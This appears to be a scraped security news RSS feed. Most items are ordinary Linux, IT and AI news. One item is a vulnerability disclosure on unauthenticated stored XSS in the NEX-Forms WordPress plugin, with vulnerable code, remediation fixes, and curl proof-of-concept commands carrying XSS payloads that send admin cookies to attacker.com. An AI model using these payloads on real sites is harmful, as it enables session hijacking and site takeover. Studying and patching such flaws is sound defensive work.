<h2><a name="p-864416-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-864416-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.176</li>
<li>linux66 6.6.143</li>
<li>linux612 6.12.94</li>
<li>linux618 6.18.37</li>
<li>linux70 7.0.14</li>
<li>linux71 7.1.2</li>
<li>linux72 7.2.0-rc1</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (7/4/26 08:10 CEST)</p>
<ul>
<li>testing core x86_64:  89 new and 88 removed package(s)</li>
<li>testing multilib x86_64:  50 new and 50 removed package(s)</li>
<li>testing extra x86_64:  3447 new and 3452 removed package(s)</li>
</ul>
<p><strong>Overlay Changes</strong></p>
<ul>
<li>testing core x86_64:  25 new and 26 removed package(s)</li>
<li>testing multilib x86_64:  6 new and 10 removed package(s)</li>
<li>testing extra x86_64:  260 new and 403 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://termbin.com/0now">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>3 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Limiting negative dentries]]></title>
<description><![CDATA[A number of problems related to negative directory entries (dentries) were
the topic of a filesystem-track session at
the 2026 Linux Storage,
Filesystem, Memory Management, and BPF Summit.  Negative dentries are
used to indicate that a file of a given name does not exist in a directory;
it is an ...]]></description>
<link>https://tsecurity.de/de/3643795/linux-tipps/limiting-negative-dentries/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643795/linux-tipps/limiting-negative-dentries/</guid>
<pubDate>Fri, 03 Jul 2026 16:24:57 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A number of problems related to negative directory entries (dentries) were
the topic of a filesystem-track session at
the 2026 <a href="https://events.linuxfoundation.org/lsfmmbpf/">Linux Storage,
Filesystem, Memory Management, and BPF Summit</a>.  Negative dentries are
used to indicate that a file of a given name does not exist in a directory;
it is an optimization that short-circuits the lookup of the file name when
the answer is already known.

Miklos Szeredi led a
session that discussed
some problems that come from having too many negative dentries for a
directory.]]></content:encoded>
</item>
<item>
<title><![CDATA[Unauthenticated Stored XSS in NEX-Forms Express WP Form Builder (≤ 9.1.10) — CVSS 8.8 High]]></title>
<description><![CDATA[TL;DR: Any anonymous visitor can POST a JavaScript payload to NEX-Forms’ form submission endpoint. The plugin stores it unsanitized in the database. When any admin opens the Entries panel, the payload executes — silently, automatically, every time. Complete site takeover from a single curl comman...]]></description>
<link>https://tsecurity.de/de/3643710/hacking/unauthenticated-stored-xss-in-nex-forms-express-wp-form-builder-9110-cvss-88-high/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643710/hacking/unauthenticated-stored-xss-in-nex-forms-express-wp-form-builder-9110-cvss-88-high/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:08 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3><strong><em>TL;DR:</em></strong><em> Any anonymous visitor can POST a JavaScript payload to NEX-Forms’ form submission endpoint. The plugin stores it unsanitized in the database. When </em>any<em> admin opens the Entries panel, the payload executes — silently, automatically, every time. Complete site takeover from a single curl command.</em></h3><p><strong>Tags:</strong> #WordPresSecurity #InfoSec #SecurityResearch</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*B0I27yDTsfPdHb4smYnl5Q.png"></figure><h3>📋 Vulnerability Summary</h3><ul><li><strong>Plugin:</strong> NEX-Forms Express WP Form Builder</li><li><strong>Affected Version:</strong> ≤ 9.1.10 (latest as of 2026–03–22)</li><li><strong>Patched Version:</strong> Fixed</li><li><strong>Disclosure Status:</strong> Officially disclosed by WPScan, with vendor approval for disclosure agreement</li><li><strong>Vulnerability Type:</strong> Stored Cross-Site Scripting (XSS)</li><li><strong>CWE:</strong> CWE-79 — Improper Neutralization of Input During Web Page Generation</li><li><strong>CVSS 3.1 Score:</strong> <strong>8.8 HIGH</strong></li><li><strong>CVSS Vector:</strong> AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N</li><li><strong>Auth Required:</strong> ❌ None — fully unauthenticated</li><li><strong>Admin Interaction:</strong> ✅ Viewing the Entries page (routine workflow)</li><li><strong>Scope Change:</strong> ✅ Crosses from visitor context into privileged admin session</li></ul><h3>🔍 Introduction</h3><p>NEX-Forms Express WP Form Builder is a widely deployed WordPress form plugin. While reviewing its form submission pipeline, I found a stored Cross-Site Scripting vulnerability that requires <strong>zero authentication</strong> to exploit and results in full WordPress administrator compromise.</p><p>The vulnerability chains <strong>three distinct weaknesses</strong>:</p><ol><li>An open AJAX handler accessible without login</li><li>Missing HTML sanitization for array-type form fields</li><li>Unescaped output rendering in the WordPress admin panel</li></ol><p>Together, these allow a remote attacker to permanently plant malicious JavaScript that fires in every administrator’s browser — automatically, every time they view the form entries.</p><h3>⛓️ Root Cause: Three Weaknesses, One Chain</h3><h3>Weakness 1 — Open AJAX Handler (main.php:2656)</h3><p>WordPress has two AJAX hook prefixes: wp_ajax_ (logged-in users) and wp_ajax_nopriv_ (anonymous users). NEX-Forms registers both for its form submission handler:</p><pre>add_action( 'wp_ajax_submit_nex_form',        'submit_nex_form' );<br>add_action( 'wp_ajax_nopriv_submit_nex_form', 'submit_nex_form' );  // ← anonymous access</pre><p>Registering a nopriv handler is legitimate for a public contact form. The problem is what the handler does — there's no nonce verification, no CSRF check, and no rate limiting:</p><pre>function submit_nex_form($entry_action = false) {<br>    // ONLY check: honeypot field must be empty<br>    if ((sanitize_text_field($_POST['company_url']) != '') || strstr(..., '@qq.com'))<br>        die();<br>    // No: wp_verify_nonce(), check_ajax_referer(), current_user_can()<br>    // → proceeds directly to processing POST data</pre><p>Leave company_url empty and avoid a @qq.com address — you're in.</p><h3>Weakness 2 — Array Fields Skip Sanitization (main.php:2883)</h3><p>Inside the handler, form fields from $_POST are processed in a loop. Here's the critical divergence:</p><pre>if (is_array($val) || is_object($val)) {<br>    // ← CWE-79: rest_sanitize_array() does NO HTML stripping<br>    $data_array[] = [<br>        'field_name'  =&gt; $key,<br>        'field_value' =&gt; rest_sanitize_array($val),<br>    ];<br>} else {<br>    $val = strip_tags($val);              // ← scalar fields ARE stripped ✓<br>    $data_array[] = ['field_name' =&gt; $key,<br>        'field_value' =&gt; sanitize_text_field(str_replace('\\', '', $val))];<br>}</pre><blockquote><em>⚠️ </em><strong><em>The key fact:</em></strong><em> </em><em>rest_sanitize_array() is a WordPress REST API utility. Its entire implementation is </em><em>return array_values($data) — it reindexes the array and does </em><strong><em>nothing else</em></strong><em>. No HTML stripping. No entity encoding. Raw </em><em>&lt;script&gt;, </em><em>&lt;img onerror&gt;, and any other HTML passes straight through.</em></blockquote><p>The fix for scalar fields is right there in the else branch. The developer correctly applied strip_tags() to strings but chose the wrong function for array inputs.</p><h3>Weakness 3 — Raw Echo in Admin View (class.db.php:2624)</h3><p>When an admin opens an entry in the NEX-Forms dashboard, populate_form_entry() decodes the stored JSON and renders each field into an HTML table. For array-type values:</p><pre>foreach ($field_value as $val) {<br>    // ...<br>    $output .= rtrim($val, ', ') . '&lt;br /&gt;';  // ← no esc_html(), raw HTML output<br>}</pre><p>rtrim() strips trailing commas and spaces. That's it. The stored &lt;img src=x onerror=alert(document.domain)&gt; is written verbatim into $output, which is echoed directly into the admin page. WordPress's esc_html() — a one-character fix — was never applied.</p><h3>🔀 Attack Chain</h3><pre>Unauthenticated Attacker<br>        │<br>        │  1. HTTP POST — no credentials, no nonce, no CSRF token<br>        │     action=submit_nex_form<br>        │     nex_forms_Id=1<br>        │     company_url=              ← honeypot bypassed (empty)<br>        │     email=attacker@evil.com<br>        │     payload[]=&lt;img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)&gt;<br>        │<br>        ▼<br>    wp_ajax_nopriv_ handler fires<br>    submit_nex_form() passes honeypot check<br>    rest_sanitize_array() stores raw HTML → wp_wap_nex_forms_entries.form_data<br>        │<br>        │  2. Normal admin workflow: NEX-Forms → Entries<br>        │     (no special action required)<br>        │<br>        ▼<br>    populate_form_entry() decodes JSON<br>    rtrim($val) echoed without esc_html()<br>    &lt;img src=x onerror=...&gt; written directly into admin page DOM<br>        │<br>        ▼<br>    Browser renders admin page<br>    onerror fires automatically (no click required)<br>    Session cookie exfiltrated to attacker's server<br>        │<br>        ▼<br>    COMPLETE SITE TAKEOVER<br>    → Rogue admin account created<br>    → Backdoor plugin installed<br>    → Full database exfiltrated</pre><h3>🗄️ Database Evidence</h3><p>After submitting the PoC payload, a direct database check confirms the raw HTML is persisted:</p><pre>SELECT form_data FROM wp_wap_nex_forms_entries ORDER BY id DESC LIMIT 1;</pre><pre>[<br>  {"field_name": "email", "field_value": "attacker@evil.com"},<br>  {"field_name": "payload", "field_value": ["&lt;img src=x onerror=alert(document.domain)&gt;"]}<br>]</pre><p>The &lt;img&gt; tag is stored <strong>verbatim</strong> with no entity encoding. It persists until manually deleted — meaning every admin who views the Entries page will trigger the XSS, not just the first.</p><h3>🖥️ Admin Page Rendered Output</h3><p>Lab-confirmed AJAX response when admin loads the injected entry:</p><pre>&lt;td valign="top" style="vertical-align:top !important;"&gt;<br>  &lt;table width="100%" class="highlight" cellpadding="10" cellspacing="0"&gt;<br>    &lt;img src=x onerror=alert(document.domain)&gt;&lt;br /&gt;<br>  &lt;/table&gt;<br>&lt;/td&gt;</pre><p>The &lt;img&gt; tag lands directly in the DOM. The browser tries to load src="x", fails, and fires onerror — <strong>no click, no interaction required</strong>.</p><h3>💻 Proof of Concept</h3><blockquote><strong><em>Disclosure note:</em></strong><em> This PoC is provided for educational and authorized security testing only. Lab environment: WordPress 6.9.4, NEX-Forms 9.1.10, Bitnami Docker.</em></blockquote><h3>Step 1 — Inject payload (unauthenticated)</h3><pre>curl -s -X POST "http://TARGET/wp-admin/admin-ajax.php" \<br>  --data "action=submit_nex_form" \<br>  --data "nex_forms_Id=1" \<br>  --data "company_url=" \<br>  --data "email=attacker@evil.com" \<br>  --data "payload[]=&lt;img src=x onerror=alert(document.domain)&gt;"</pre><p>Expected response — valid entry ID confirms storage:</p><pre>&lt;input type="hidden" name="nf_entry_id" value="13"&gt;</pre><h3>Step 2 — Verify raw storage</h3><pre>wp db query "SELECT form_data FROM wp_wap_nex_forms_entries ORDER BY id DESC LIMIT 1;"<br># The &lt;img&gt; tag appears verbatim in field_value — no HTML encoding.</pre><h3>Step 3 — Trigger XSS as admin</h3><ol><li>Log in to WordPress admin: <a href="http://target/wp-admin/">http://TARGET/wp-admin/</a></li><li>Navigate to <strong>NEX-Forms → Form Entries</strong></li><li>Click the affected form → click the injected entry row</li><li>alert("localhost:8080") fires immediately — no interaction beyond page load</li></ol><h3>Step 4 — Real-world session hijack</h3><pre>curl -s -X POST "http://TARGET/wp-admin/admin-ajax.php" \<br>  --data "action=submit_nex_form" \<br>  --data "nex_forms_Id=1" \<br>  --data "company_url=" \<br>  --data "email=attacker@evil.com" \<br>  --data 'payload[]=&lt;img src=x onerror="var i=new Image();i.src='"'"'https://attacker.com/steal?c='"'"'+encodeURIComponent(document.cookie);"&gt;'</pre><p>When the administrator views entries, their session cookie is silently exfiltrated. From there, the attacker can create rogue admin accounts, install PHP webshell plugins, or dump the entire database.</p><h3>💥 Impact</h3><ul><li><strong>Admin views Entries (normal workflow):</strong> JavaScript executes in admin browser context</li><li><strong>Session cookie theft:</strong> Attacker hijacks admin session without credentials</li><li><strong>Rogue admin creation:</strong> fetch() silently POSTs to /wp-json/wp/v2/users</li><li><strong>Plugin upload via REST API:</strong> PHP webshell installed without further interaction</li><li><strong>Site defacement:</strong> document.body.innerHTML overwritten</li><li><strong>Persistent backdoor:</strong> Payload fires for every admin who views entries</li></ul><h3>🛠️ Remediation</h3><p>Two independent fixes are both necessary: sanitize at input, escape at output.</p><h3>Fix 1 — Sanitize array fields at storage (main.php:2883)</h3><p><strong>Vulnerable:</strong></p><pre>$data_array[] = [<br>    'field_name'  =&gt; $key,<br>    'field_value' =&gt; rest_sanitize_array($val),  // ← no HTML stripping<br>];</pre><p><strong>Fixed:</strong></p><pre>$sanitized = array_map('sanitize_text_field', (array) $val);<br>$data_array[] = [<br>    'field_name'  =&gt; $key,<br>    'field_value' =&gt; $sanitized,<br>];</pre><h3>Fix 2 — Escape output in admin view (class.db.php:2624)</h3><p><strong>Vulnerable:</strong></p><pre>$output .= rtrim($val, ', ') . '&lt;br /&gt;';</pre><p><strong>Fixed:</strong></p><pre>$output .= esc_html(rtrim($val, ', ')) . '&lt;br /&gt;';</pre><h3>Fix 3 — Nonce verification (defense-in-depth)</h3><pre>// Add at the top of submit_nex_form():<br>if (!isset($_POST['nf_nonce']) ||<br>    !wp_verify_nonce($_POST['nf_nonce'], 'nf_submit_' . $nex_forms_id)) {<br>    wp_send_json_error('Invalid request');<br>}</pre><blockquote><em>Fix 1 and Fix 2 each independently prevent the XSS. Fix 3 makes automated injection harder but is not a substitute for proper sanitization and escaping.</em></blockquote><h3>📊 CVSS 3.1 Breakdown</h3><ul><li><strong>Attack Vector (AV):</strong> Network (N) — Exploitable remotely over HTTP</li><li><strong>Attack Complexity (AC):</strong> Low (L) — Works on any default installation with a form</li><li><strong>Privileges Required (PR):</strong> None (N) — Fully unauthenticated</li><li><strong>User Interaction (UI):</strong> Required (R) — Admin views entries — their normal workflow</li><li><strong>Scope (S):</strong> Changed © — XSS crosses from visitor into privileged admin session</li><li><strong>Confidentiality ©:</strong> High (H) — Admin cookies, DB content, secret keys exposed</li><li><strong>Integrity (I):</strong> High (H) — Can create admins, install plugins, modify all content</li><li><strong>Availability (A):</strong> None (N) — No direct denial-of-service impact</li></ul><p><strong>Base Score: 8.8 HIGH</strong> — AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N</p><h3>📣 Disclosure Resources</h3><ul><li><strong>Plugin Author:</strong> <a href="https://basixonline.net/">https://basixonline.net/</a></li><li><strong>WordPress Plugin Support:</strong> <a href="https://wordpress.org/support/plugin/nex-forms-express-wp-form-builder/">https://wordpress.org/support/plugin/nex-forms-express-wp-form-builder/</a></li><li><strong>Wordfence Bug Bounty:</strong> <a href="https://www.wordfence.com/wordfence-intelligence-wordpress-vulnerability-database/">https://www.wordfence.com/wordfence-intelligence-wordpress-vulnerability-database/</a></li><li><strong>WPScan Vulnerability Database:</strong> <a href="https://wpscan.com/">https://wpscan.com/</a></li></ul><h3>🔑 Key Takeaways</h3><p><strong>For developers:</strong></p><ul><li>Always apply esc_html() (or esc_attr(), esc_url()) at every output point in WordPress — even in admin-only pages</li><li>Never assume admin-facing output is “safe” — XSS in admin context is just as dangerous as front-end XSS</li><li>rest_sanitize_array() is for REST API coercion, not for HTML sanitization — use array_map('sanitize_text_field', $arr) instead</li><li>Apply the same sanitization consistently across all field types — asymmetric handling creates exploitable edge cases</li></ul><p><strong>For site owners:</strong></p><ul><li>If you use NEX-Forms Express ≤ 9.1.10, update immediately to the patched version.</li><li>Monitor your form entries for unexpected HTML or JavaScript in field values</li><li>Consider a WAF rule blocking &lt;script, onerror=, and javascript: in form POST bodies</li></ul><p>Stay tune for more!!!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=e4bf33e67e82" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/unauthenticated-stored-xss-in-nex-forms-express-wp-form-builder-9-1-10-cvss-8-8-high-e4bf33e67e82">Unauthenticated Stored XSS in NEX-Forms Express WP Form Builder (≤ 9.1.10) — CVSS 8.8 High</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Europe’s sovereignty ambitions stall at the procurement desk]]></title>
<description><![CDATA[Nextcloud Summit in Munich shows that Europe’s sovereignty ambitions meet their real test not in the technology, but in the procurement decisions that will determine whether EU legislation changes anything on the ground]]></description>
<link>https://tsecurity.de/de/3643473/it-nachrichten/europes-sovereignty-ambitions-stall-at-the-procurement-desk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643473/it-nachrichten/europes-sovereignty-ambitions-stall-at-the-procurement-desk/</guid>
<pubDate>Fri, 03 Jul 2026 14:03:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nextcloud Summit in Munich shows that Europe’s sovereignty ambitions meet their real test not in the technology, but in the procurement decisions that will determine whether EU legislation changes anything on the ground]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: Digitale Souveränität in der Praxis: Strategien, Fallstudien, Know-how]]></title>
<description><![CDATA[Der IT Summit 2026 zeigt IT-Verantwortlichen konkrete Wege, wie sie ihr Unternehmen bei KI, Arbeitsplatz und Infrastruktur digital souveräner aufstellen können.]]></description>
<link>https://tsecurity.de/de/3642832/it-nachrichten/heise-angebot-digitale-souveraenitaet-in-der-praxis-strategien-fallstudien-know-how/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642832/it-nachrichten/heise-angebot-digitale-souveraenitaet-in-der-praxis-strategien-fallstudien-know-how/</guid>
<pubDate>Fri, 03 Jul 2026 08:18:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der IT Summit 2026 zeigt IT-Verantwortlichen konkrete Wege, wie sie ihr Unternehmen bei KI, Arbeitsplatz und Infrastruktur digital souveräner aufstellen können.]]></content:encoded>
</item>
<item>
<title><![CDATA[College Leaders Gather to Collaborate on AI Adoption]]></title>
<description><![CDATA[Complete College America’s AI and Student Success Summit this week drew nearly 200 participants from 30 institutions across the country to discuss proactively building governance and infrastructure.]]></description>
<link>https://tsecurity.de/de/3642425/ai-nachrichten/college-leaders-gather-to-collaborate-on-ai-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642425/ai-nachrichten/college-leaders-gather-to-collaborate-on-ai-adoption/</guid>
<pubDate>Fri, 03 Jul 2026 01:18:21 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Complete College America’s AI and Student Success Summit this week drew nearly 200 participants from 30 institutions across the country to discuss proactively building governance and infrastructure.]]></content:encoded>
</item>
<item>
<title><![CDATA[Will Trump Take the Win at NATO’s Ankara Summit?]]></title>
<description><![CDATA[It is an open question whether the Trump administration seeks to rebalance NATO or disengage the U.S. from European security.
The post Will Trump Take the Win at NATO’s Ankara Summit? appeared first on Just Security.]]></description>
<link>https://tsecurity.de/de/3641299/it-security-nachrichten/will-trump-take-the-win-at-natos-ankara-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641299/it-security-nachrichten/will-trump-take-the-win-at-natos-ankara-summit/</guid>
<pubDate>Thu, 02 Jul 2026 15:23:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>It is an open question whether the Trump administration seeks to rebalance NATO or disengage the U.S. from European security.</p>
<p>The post <a href="https://www.justsecurity.org/144465/will-trump-take-the-win-at-natos-ankara-summit/">Will Trump Take the Win at NATO’s Ankara Summit?</a> appeared first on <a href="https://www.justsecurity.org/">Just Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die stärkste Cyber-Abwehr 2026 ist keine Technologie – sondern das Team]]></title>
<description><![CDATA[KI-gestützte Angriffe überwinden selbst beste Firewalls. Was wirklich schützt: gut vorbereitete Menschen. Wie du Cyber-Resilienz zur Teamkompetenz machst, zeigt der Signal Security Summit am 18. November in Köln.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3641208/it-nachrichten/die-staerkste-cyber-abwehr-2026-ist-keine-technologie-sondern-das-team/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641208/it-nachrichten/die-staerkste-cyber-abwehr-2026-ist-keine-technologie-sondern-das-team/</guid>
<pubDate>Thu, 02 Jul 2026 14:47:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-gestützte Angriffe überwinden selbst beste Firewalls. Was wirklich schützt: gut vorbereitete Menschen. Wie du Cyber-Resilienz zur Teamkompetenz machst, zeigt der Signal Security Summit am 18. November in Köln.
<a href="https://t3n.de/news/cyber-resilienz-team-ki-angriffe-1745335/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best practices for using AI to generate C# code]]></title>
<description><![CDATA[AI-powered software development tools integrate with your IDE and codebase, helping you to write, refactor, and fix code faster. These tools also make it fast and easy to create and run unit tests and integration tests — tasks that take more time when done manually.



Today, .NET developers ofte...]]></description>
<link>https://tsecurity.de/de/3640601/ai-nachrichten/best-practices-for-using-ai-to-generate-c-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640601/ai-nachrichten/best-practices-for-using-ai-to-generate-c-code/</guid>
<pubDate>Thu, 02 Jul 2026 11:04:37 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI-powered software development tools integrate with your IDE and codebase, helping you to write, refactor, and fix code faster. These tools also make it fast and easy to create and run unit tests and integration tests — tasks that take more time when done manually.</p>



<p>Today, .NET developers often use <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" data-type="link" data-id="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>, <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html" data-type="link" data-id="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a>, Cursor AI, and even AI chatbots like ChatGPT to generate code. In this article, we’ll cover some best practices you should follow when using AI to generate your C# code.</p>



<h2 class="wp-block-heading">Challenges of using AI-generated code</h2>



<p>While AI can write code for you, often the generated code does not work as intended. AI may generate code that contains logic errors, bugs, or security vulnerabilities, or code that doesn’t conform to your organization’s coding conventions or quality standards, or code that isn’t compatible with existing architecture. Further, AI may generate code that runs slowly or fails to run at all.</p>



<p>These are some of the key challenges organizations face when using AI-generated code in production:</p>



<ul class="wp-block-list">
<li>Inconsistency: The quality of AI-generated code can vary widely because the same generative AI prompt can produce different results, making it impossible to trust the code until it has been reviewed.</li>



<li>Security: The potential for AI-generated code to generate insecure code is significant, because models are trained on open-source code that contains security vulnerabilities including weak/unsafe validation, injection patterns, hard-coded secrets, memory safety issues, and outdated dependencies.</li>



<li>Accountability: AI-generated code often creates an accountability gap because organizations find they have limited visibility into how AI-assisted code was generated, approved, and tested.</li>



<li>Contextual concerns: Because your AI-powered tool may not have access to project-specific conventions, abstractions, or business rules, the code it generates may not conform to the standards of your organization’s codebase.</li>



<li>Overengineering: AI models can produce large amounts of unnecessary code and create additional layers of abstraction, making the code more complex and more difficult to understand and maintain.</li>



<li>Error handling: Often, AI-generated code succeeds in creating the required logic based on the “happy path” of an application, but does not create sufficient or adequate recovery, retry, or validation logic. Additionally, AI-generated code may not incorporate proper error handling mechanisms.</li>



<li>Technical debt: The sheer amount of generated code can require additional resources for reviewing, cleaning, refactoring, and debugging the code after the fact, as well as for maintaining the code in the future.</li>
</ul>



<h2 class="wp-block-heading">Best practices for using AI to write code</h2>



<p>Here are some of the best practices you should follow when writing code using AI-powered tools:</p>



<h3 class="wp-block-heading">Write clear and specific prompts</h3>



<p>To get the best use of AI-assisted coding tools, you should be proficient in prompt engineering. Your prompts should be specific, concise, and contain relevant code examples to enable your AI-powered tools to generate code that is functional, meets the requirements, and conforms to the standards and guidelines. Most importantly, you should plan precisely on the architecture and design, the exact solution you need, the structure of the codebase, and the coding and design guidelines to follow.</p>



<h3 class="wp-block-heading">Use AI as a peer programmer</h3>



<p>You should always treat AI as a peer programmer and your (junior) coding assistant. You should always review code the AI generates for you, run tests, and perform audits to validate correctness, conformance to guidelines and standards, performance and scalability bottlenecks, and security vulnerabilities. Based on the outcome of the audit, you should refactor your AI-generated code accordingly. And, repeat this cycle iteratively — audit followed by refactoring (if required) — until you are satisfied with the code.</p>



<h3 class="wp-block-heading">Favor quality over speed</h3>



<p>Your application source code should be performant, scalable, secure, extendable, and easy to comprehend and maintain. One of the biggest challenges of using AI-generated code is ensuring it meets requirements and conforms to the guidelines and standards of your organization without compromising on performance, scalability, and security.</p>



<p>AI can generate code for you quite quickly, but the onus is on you to understand how the code works, investigate it for any flaws, test it thoroughly, and change it if and when it is needed. You must be sure to understand the code in its entirety. Unless you comprehend the code, you will never be able to improve or extend it when you need to.</p>



<p>And you must never compromise quality for speed. If you use AI as a shortcut, your code may fail when deployed to the production environment — and that would be a disaster. </p>



<h3 class="wp-block-heading">Provide the right context</h3>



<p>The code your AI-powered tool generates for you will be more useful to you if you’ve provided the right context. You should provide your AI coding tool with comprehensive, up-front information, such as architecture docs, coding standards, and relevant files, rather than just providing instructions using prompts. And you should add images or screenshots when specifying prompts to help your AI-powered tool better understand the context.</p>



<p>Your AI-generated code must be testable for best results. It is always a good practice to specify tests at the time when your AI-enabled tool generates code, as tests can help AI understand the expected behavior and produce code that better aligns with your expectations. Additionally, you should specify the exact goal, the current and/or target technology stack, the relevant code boundaries, and the definition of “done”, i.e., the desired outcome.</p>



<h2 class="wp-block-heading">Creating a Data Transfer Object using GitHub Copilot</h2>



<p>Remember, any AI-powered code generator is only as good as the input provided to it. This input is also known as the prompt. If the prompt you specify does not clearly state the objective, the generated code will not meet your requirements. Here is an example of a prompt that fails to consider performance and lacks clarity.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Generate code to create a Product DTO having fields Id, Name, and Price</p>
</blockquote>



<p>When I entered this prompt into the GitHub Copilot Chat window, the following piece of code was generated. </p>



<pre class="wp-block-code"><code>public class Product
{
   public int Id { get; set; }
   public string Name { get; set; } = string.Empty;
   public decimal Price { get; set; }
   public Product() { }
   public Product(int id, string name, decimal price)
   {
       Id = id; Name = name; Price = price;
   }
}
</code></pre>



<p>Typically, a DTO (Data Transfer Object) should be created using records for improved performance instead of classes. Moreover, a DTO should be immutable by default, because its purpose is to store and pass data from the presentation layer to the business layer in an application. This not only guarantees thread safety but also prevents accidental changes to data and simplifies testability.</p>



<p>Now, let’s change the prompt as shown below and try again. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Create an immutable Product DTO using C# that uses the record type, having fields Id, Name, and Price.</p>
</blockquote>



<p>When I entered the above prompt in GitHub Copilot Chat, a record type named ProductDto was created using a positional record as shown below. </p>



<pre class="wp-block-code"><code>public sealed record ProductDto(int Id, string Name, decimal Price);
</code></pre>



<h2 class="wp-block-heading">Creating a logging library using GitHub Copilot</h2>



<p>In this next example, we’ll use GitHub Copilot within the Visual Studio IDE. With GitHub Copilot up and running in our IDE, you can specify the following prompt for creating a logging library using GitHub CoPilot within the Visual Studio IDE:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Create an asynchronous logger using .NET 10 and C# 14 that:</p>



<ul class="wp-block-list">
<li>Stores logs asynchronously in a text file or a database</li>



<li>Uses a SQLite database for storing logs in a database</li>
</ul>



<p>The log target should be configurable, i.e., the storage target of the generated log can be a file, a database, or etc.</p>



<p>Create a separate class for each log target, i.e., FileLogger for storing logs in a file and DbLogger for storing logs in the databas<em>Dave Bermingham</em>e</p>



<p>Incorporate comprehensive error handling mechanism wherever applicable</p>
</blockquote>



<p>Figure 1 shows this prompt in GitHub Copilot (running in Visual Studio) and the files that Copilot generated for the project.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/AI-Csharp-GitHub-Copilot.png?w=373" alt="AI Csharp GitHub Copilot" class="wp-image-4191827" width="373" height="1023" sizes="auto, (max-width: 373px) 100vw, 373px"><figcaption class="wp-element-caption"><p>Figure 1</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



